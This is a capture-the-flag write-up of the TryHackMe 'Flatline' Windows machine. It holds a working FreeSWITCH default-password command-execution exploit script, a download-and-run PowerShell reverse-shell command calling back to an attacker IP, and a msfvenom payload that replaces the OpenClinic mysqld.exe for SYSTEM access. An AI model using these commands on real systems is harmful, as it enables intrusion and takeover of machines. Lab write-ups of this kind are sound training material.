Flatline (FreeSwitch, OpenClinic)
First, we need to scan using nmap.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/flatline
╰─➤ nmap -A -Pn 10.10.21.42 | tee nmap.log 130 ↵
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-03 01:17 +0630
Nmap scan report for 10.10.21.42
Host is up (0.25s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WIN-EOM4PK0578N
| NetBIOS_Domain_Name: WIN-EOM4PK0578N
| NetBIOS_Computer_Name: WIN-EOM4PK0578N
| DNS_Domain_Name: WIN-EOM4PK0578N
| DNS_Computer_Name: WIN-EOM4PK0578N
| Product_Version: 10.0.17763
|_ System_Time: 2022-04-02T18:46:39+00:00
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Not valid before: 2021-11-08T16:47:35
|_Not valid after: 2022-05-10T16:47:35
|_ssl-date: 2022-04-02T18:46:40+00:00; -56s from scanner time.
8021/tcp open freeswitch-event FreeSWITCH mod_event_socket
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -56s, deviation: 0s, median: -56s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.88 secondsPort 3389 is RDP. In the result, we see port 8021 is quiet interesting. Let's connect using netcat.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/flatline
╰─➤ nc 10.10.21.42 8021
Content-Type: auth/request
Content-Type: text/disconnect-notice
Content-Length: 67
Disconnected, goodbye.
See you at ClueCon! http://www.cluecon.com/Connect using Telnet. After googling a bit, we found default username. Here is a link - http://lists.freeswitch.org/pipermail/freeswitch-users/2009-January/038381.html
╭─hnl@hnl ~/Desktop/ctf/tryhackme/flatline
╰─➤ telnet 10.10.21.42 8021
Trying 10.10.21.42...
Connected to 10.10.21.42.
Escape character is '^]'.
Content-Type: auth/request
auth ClueCon
Content-Type: command/reply
Reply-Text: +OK accepted
help
Content-Type: command/reply
Reply-Text: -ERR command not foundTry to search exploit for this port. Here is a python script to exploit this https://www.exploit-db.com/exploits/47799
#!/usr/bin/python3
from socket import *
import sys
if len(sys.argv) != 3:
print('Missing arguments')
print('Usage: freeswitch-exploit.py <target> <cmd>')
sys.exit(1)
ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='ClueCon' # default password for FreeSWITCH
s=socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))
response = s.recv(1024)
if b'auth/request' in response:
s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
response = s.recv(1024)
if b'+OK accepted' in response:
print('Authenticated')
s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
response = s.recv(8096).decode()
print(response)
else:
print('Authentication failed')
sys.exit(1)
else:
print('Not prompted for authentication, likely not vulnerable')
sys.exit(1)Exploit using this python script. Luckily, it worked!!
We can try api system command to run on telnet for command execution.
Let's get reverse shell using nishang tools. At the end of the file, we add Invoke-PowerShellTcp to call itself. Here is at the end of the PowerShellTcp.ps1. ANd then we will change the name of the file to PowerShellTcpEx.ps1.
catch
{
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.9.2.121 -Port 9001Execute the exploit.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/flatline
╰─➤ python3 exploit.py 10.10.21.42 "powershell.exe iex (iwr http://10.9.2.121/Invoke-PowerShellTcpEx.ps1 -UseBasicParsing)"In netcat session, we got reverse shell from victim machine.
We can read the user flag, but not root flag.
In C:\ directory, we found interesting directory name projects
PS C:\users\Nekrotic\Desktop> cd c:\
PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 15/09/2018 08:19 PerfLogs
d-r--- 09/11/2021 16:41 Program Files
d----- 09/11/2021 07:13 Program Files (x86)
d----- 09/11/2021 07:18 projects
d-r--- 09/11/2021 07:28 Users
d----- 09/11/2021 16:47 Windows At this directory, we found openclinic system is running on this system.
PS C:\projects\openclinic> dir
Directory: C:\projects\openclinic
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 09/11/2021 07:29 jdk1.8
d----- 09/11/2021 07:19 mariadb
d----- 09/11/2021 07:30 tomcat8
d----- 09/11/2021 07:29 Uninstall
-a---- 06/04/2021 23:14 250 configureCountry.bat
-a---- 01/07/2021 18:20 167 configureLanguage.bat
-a---- 09/11/2021 07:18 334840 lua5.1.dll
-a---- 07/06/2021 16:58 93696 OpenClinic GA login.exe
-a---- 08/05/2020 12:17 27136 OpenClinicStartServices.exe
-a---- 02/05/2021 00:45 316 stopOpenClinicHttp.bat
-a---- 09/11/2021 07:18 1389568 uninstall.exeHere is POC to exploit this https://www.exploit-db.com/exploits/50448. First, we create malicious exe files using msfvenom.
msfvenom -p windows/shell_reverse_tcp LHOST=10.9.2.121 LPORT=9002 -f exe > mysqld_evil.exeHost it and download this files from victim machine.
curl http://10.9.2.121/mysqld_evil.exe -o "C:\projects\openclinic\mariadb\bin\mysqld_evil.exe"Change file name.
PS C:\projects\openclinic\mariadb\bin> mv mysqld.exe mysqld.exe.bak
PS C:\projects\openclinic\mariadb\bin> mv mysqld_evil.exe mysqld.exeRestart the machine.
shutdown /rIn netcat session, we got reverse shell with system access.
Last updated
Was this helpful?